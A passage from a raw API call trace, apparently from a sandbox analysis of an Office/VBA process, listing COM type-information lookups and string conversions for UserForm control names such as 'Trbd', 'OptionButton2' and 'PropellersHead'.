ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2048, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2480) returned 0x0 [0032.879] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2048, hreftype=0x2480, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b20a0) returned 0x0 [0032.879] IUnknown:Release (This=0xb5b20a0) returned 0x0 [0032.880] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2048, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.880] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2048, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2e00) returned 0x0 [0032.880] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2048, hreftype=0x2e00, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2150) returned 0x0 [0032.880] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2003, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Trbd", cchWideChar=5, lpMultiByteStr=0x2e43a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Trbd", lpUsedDefaultChar=0x0) returned 5 [0032.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Trbd") returned 0x10ee34 [0032.880] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x500003d, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b21a8) returned 0x0 [0032.880] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b21a8, ppTypeAttr=0x2e4420, pDummy=0x548 | out: ppTypeAttr=0x2e4420, pDummy=0x548) returned 0x0 [0032.880] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b21a8) returned 0x0 [0032.880] ITypeInfo:GetImplTypeFlags (in: This=0xb5b21a8, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.880] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b21a8, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2200) returned 0x0 [0032.880] ITypeInfo:GetRefTypeInfo (in: This=0xb5b21a8, hreftype=0x2200, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2200) returned 0x0 [0032.881] IUnknown:Release (This=0xb5b2200) returned 0x0 [0032.881] ITypeInfo:GetImplTypeFlags (in: This=0xb5b21a8, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.881] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b21a8, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2a00) returned 0x0 [0032.881] ITypeInfo:GetRefTypeInfo (in: This=0xb5b21a8, hreftype=0x2a00, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b22b0) returned 0x0 [0032.881] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2009, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Label1", cchWideChar=7, lpMultiByteStr=0x2e43a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Label1", lpUsedDefaultChar=0x0) returned 7 [0032.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Label1") returned 0x102c8d [0032.881] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000049, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b2308) returned 0x0 [0032.881] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e4420, pDummy=0x500 | out: ppTypeAttr=0x2e4420, pDummy=0x500) returned 0x0 [0032.881] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.881] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.881] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2080) returned 0x0 [0032.881] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2080, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2360) returned 0x0 [0032.882] IUnknown:Release (This=0xb5b2360) returned 0x0 [0032.882] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.882] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2800) returned 0x0 [0032.882] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2800, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2410) returned 0x0 [0032.883] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2012, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZK", cchWideChar=3, lpMultiByteStr=0x2e43a0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZK", lpUsedDefaultChar=0x0) returned 3 [0032.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZK") returned 0x106022 [0032.883] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000049, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b2308) returned 0x0 [0032.883] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e4420, pDummy=0x3be | out: ppTypeAttr=0x2e4420, pDummy=0x3be) returned 0x0 [0032.883] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.883] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.883] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2080) returned 0x0 [0032.883] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2080, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2360) returned 0x0 [0032.883] IUnknown:Release (This=0xb5b2360) returned 0x0 [0032.883] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.883] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2800) returned 0x0 [0032.883] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2800, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2410) returned 0x0 [0032.884] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2014, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CHAS", cchWideChar=5, lpMultiByteStr=0x2e43a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHAS", lpUsedDefaultChar=0x0) returned 5 [0032.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CHAS") returned 0x10982a [0032.884] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000049, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b2308) returned 0x0 [0032.884] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e4420, pDummy=0x50c | out: ppTypeAttr=0x2e4420, pDummy=0x50c) returned 0x0 [0032.884] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.884] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.884] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2080) returned 0x0 [0032.884] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2080, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2360) returned 0x0 [0032.884] IUnknown:Release (This=0xb5b2360) returned 0x0 [0032.884] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.884] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2800) returned 0x0 [0032.884] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2800, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2410) returned 0x0 [0032.885] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2016, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o3", cchWideChar=3, lpMultiByteStr=0x2e43a0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o3", lpUsedDefaultChar=0x0) returned 3 [0032.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="o3") returned 0x105e73 [0032.885] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000049, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b2308) returned 0x0 [0032.885] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e4420, pDummy=0x504 | out: ppTypeAttr=0x2e4420, pDummy=0x504) returned 0x0 [0032.885] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.885] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.885] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2080) returned 0x0 [0032.885] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2080, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2360) returned 0x0 [0032.885] IUnknown:Release (This=0xb5b2360) returned 0x0 [0032.885] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.885] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2800) returned 0x0 [0032.885] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2800, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2410) returned 0x0 [0032.886] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2019, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OptionButton2", cchWideChar=14, lpMultiByteStr=0x2e43a0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OptionButton2", lpUsedDefaultChar=0x0) returned 14 [0032.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OptionButton2") returned 0x10406c [0032.886] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000025, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b1d88) returned 0x0 [0032.886] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1d88, ppTypeAttr=0x2e4420, pDummy=0x532 | out: ppTypeAttr=0x2e4420, pDummy=0x532) returned 0x0 [0032.886] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1d88) returned 0x0 [0032.886] ITypeInfo:GetImplTypeFlags (in: This=0xb5b1d88, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.886] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b1d88, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2400) returned 0x0 [0032.886] ITypeInfo:GetRefTypeInfo (in: This=0xb5b1d88, hreftype=0x2400, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b1de0) returned 0x0 [0032.886] IUnknown:Release (This=0xb5b1de0) returned 0x0 [0032.886] ITypeInfo:GetImplTypeFlags (in: This=0xb5b1d88, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.886] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b1d88, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2d80) returned 0x0 [0032.886] ITypeInfo:GetRefTypeInfo (in: This=0xb5b1d88, hreftype=0x2d80, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b1ff0) returned 0x0 [0032.886] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2020, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PropellersHead", cchWideChar=15, lpMultiByteStr=0x2e43a0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PropellersHead", lpUsedDefaultChar=0x0) returned 15 [0032.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PropellersHead") returned 0x108b25 [0032.887] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x500003d, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b21a8) returned 0x0 [0032.887] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b21a8, ppTypeAttr=0x2e4420, pDummy=0x36c | out: ppTypeAttr=0x2e4420, pDummy=0x36c) returned 0x0 [0032.887] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b21a8) returned 0x0 [0032.887] ITypeInfo:GetImplTypeFlags (in: This=0xb5b21a8, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.887] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b21a8, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2200) returned 0x0 [0032.887] ITypeInfo:GetRefTypeInfo (in: This=0xb5b21a8, hreftype=0x2200, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2200) returned 0x0 [0032.887] IUnknown:Release (This=0xb5b2200) returned 0x0 [0032.887] ITypeInfo:GetImplTypeFlags (in: This=0xb5b21a8, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.887] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b21a8, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2a00) returned 0x0 [0032.887] ITypeInfo:GetRefTypeInfo (in: This=0xb5b21a8, hreftype=0x2a00, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b22b0) returned 0x0 [0032.887] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2022, refPtrFlags=0x2e44e8, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpinButton1", cchWideChar=12, lpMultiByteStr=0x2e43a0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpinButton1", lpUsedDefaultChar=0x0) returned 12 [0032.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SpinButton1") returned 0x1038bd [0032.887] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000055, ppTInfo=0x2e44c0 | out: ppTInfo=0x2e44c0*=0xb5b2468) returned 0x0 [0032.887] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2468, ppTypeAttr=0x2e4420, pDummy=0x534 | out: ppTypeAttr=0x2e4420, pDummy=0x534) returned 0x0 [0032.887] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2468) returned 0x0 [0032.887] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2468, index=0x0, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=1) returned 0x0 [0032.888] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2468, index=0x0, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x2700) returned 0x0 [0032.888] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2468, hreftype=0x2700, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b24c0) returned 0x0 [0032.888] IUnknown:Release (This=0xb5b24c0) returned 0x0 [0032.888] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2468, index=0x1, pImplTypeFlags=0x2e4408 | out: pImplTypeFlags=0x2e4408*=3) returned 0x0 [0032.888] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2468, index=0x1, pRefType=0x2e4410 | out: pRefType=0x2e4410*=0x3280) returned 0x0 [0032.888] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2468, hreftype=0x3280, ppTInfo=0x2e4418 | out: ppTInfo=0x2e4418*=0xb5b2570) returned 0x0 [0032.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm", cchWideChar=9, lpMultiByteStr=0x2e43e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm", lpUsedDefaultChar=0x0) returned 9 [0032.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm") returned 0x10044e [0032.888] GetLocalTime (in: lpSystemTime=0x2e47d8 | out: lpSystemTime=0x2e47d8*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x23, wMilliseconds=0x30e)) [0032.888] _ultow_s (in: _Value=0x5b6852df, _Buffer=0xb4c643c, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852df") returned 0x0 [0032.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0?5b6852df", cchWideChar=11, lpMultiByteStr=0x2e4730, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0?5b6852df", lpUsedDefaultChar=0x0) returned 11 [0032.888] IUnknown:AddRef (This=0xb5a5078) returned 0x4 [0032.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0032.889] IUnknown:AddRef (This=0xb5a5078) returned 0x4 [0032.889] IUnknown:AddRef (This=0xb5a51f8) returned 0x3 [0032.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm", cchWideChar=9, lpMultiByteStr=0x2e4190, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm", lpUsedDefaultChar=0x0) returned 9 [0032.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm") returned 0x10044e [0032.893] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2001, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2e42a0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2e42a0*="") returned 0x0 [0032.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OptionButton1", cchWideChar=14, lpMultiByteStr=0x2e4150, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OptionButton1", lpUsedDefaultChar=0x0) returned 14 [0032.894] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OptionButton1") returned 0x10406b [0032.894] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000025, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b1d88) returned 0x0 [0032.894] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1d88, ppTypeAttr=0x2e41d0, pDummy=0x51e | out: ppTypeAttr=0x2e41d0, pDummy=0x51e) returned 0x0 [0032.894] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1d88) returned 0x0 [0032.894] ITypeInfo:GetImplTypeFlags (in: This=0xb5b1d88, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.894] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b1d88, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2400) returned 0x0 [0032.894] ITypeInfo:GetRefTypeInfo (in: This=0xb5b1d88, hreftype=0x2400, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b1de0) returned 0x0 [0032.894] IUnknown:Release (This=0xb5b1de0) returned 0x0 [0032.894] ITypeInfo:GetImplTypeFlags (in: This=0xb5b1d88, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.894] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b1d88, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2d80) returned 0x0 [0032.894] ITypeInfo:GetRefTypeInfo (in: This=0xb5b1d88, hreftype=0x2d80, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b1ff0) returned 0x0 [0032.894] IUnknown:Release (This=0xb5b1ff0) returned 0x2 [0032.894] IUnknown:Release (This=0xb5b1d88) returned 0x1 [0032.894] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2002, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ToggleButton2", cchWideChar=14, lpMultiByteStr=0x2e4150, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ToggleButton2", lpUsedDefaultChar=0x0) returned 14 [0032.894] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ToggleButton2") returned 0x10bc48 [0032.894] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000031, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b2048) returned 0x0 [0032.894] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2048, ppTypeAttr=0x2e41d0, pDummy=0x3ba | out: ppTypeAttr=0x2e41d0, pDummy=0x3ba) returned 0x0 [0032.894] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2048) returned 0x0 [0032.894] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2048, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.894] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2048, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2480) returned 0x0 [0032.894] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2048, hreftype=0x2480, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b20a0) returned 0x0 [0032.895] IUnknown:Release (This=0xb5b20a0) returned 0x0 [0032.895] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2048, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.895] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2048, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2e00) returned 0x0 [0032.895] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2048, hreftype=0x2e00, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2150) returned 0x0 [0032.895] IUnknown:Release (This=0xb5b2150) returned 0x1 [0032.895] IUnknown:Release (This=0xb5b2048) returned 0x1 [0032.895] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2003, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Trbd", cchWideChar=5, lpMultiByteStr=0x2e4150, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Trbd", lpUsedDefaultChar=0x0) returned 5 [0032.895] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Trbd") returned 0x10ee34 [0032.895] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x500003d, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b21a8) returned 0x0 [0032.895] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b21a8, ppTypeAttr=0x2e41d0, pDummy=0x548 | out: ppTypeAttr=0x2e41d0, pDummy=0x548) returned 0x0 [0032.895] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b21a8) returned 0x0 [0032.895] ITypeInfo:GetImplTypeFlags (in: This=0xb5b21a8, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.895] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b21a8, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2200) returned 0x0 [0032.895] ITypeInfo:GetRefTypeInfo (in: This=0xb5b21a8, hreftype=0x2200, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2200) returned 0x0 [0032.895] IUnknown:Release (This=0xb5b2200) returned 0x0 [0032.895] ITypeInfo:GetImplTypeFlags (in: This=0xb5b21a8, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.895] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b21a8, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2a00) returned 0x0 [0032.895] ITypeInfo:GetRefTypeInfo (in: This=0xb5b21a8, hreftype=0x2a00, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b22b0) returned 0x0 [0032.895] IUnknown:Release (This=0xb5b22b0) returned 0x2 [0032.895] IUnknown:Release (This=0xb5b21a8) returned 0x1 [0032.895] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2009, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.895] WideCharToMultiByte (in: 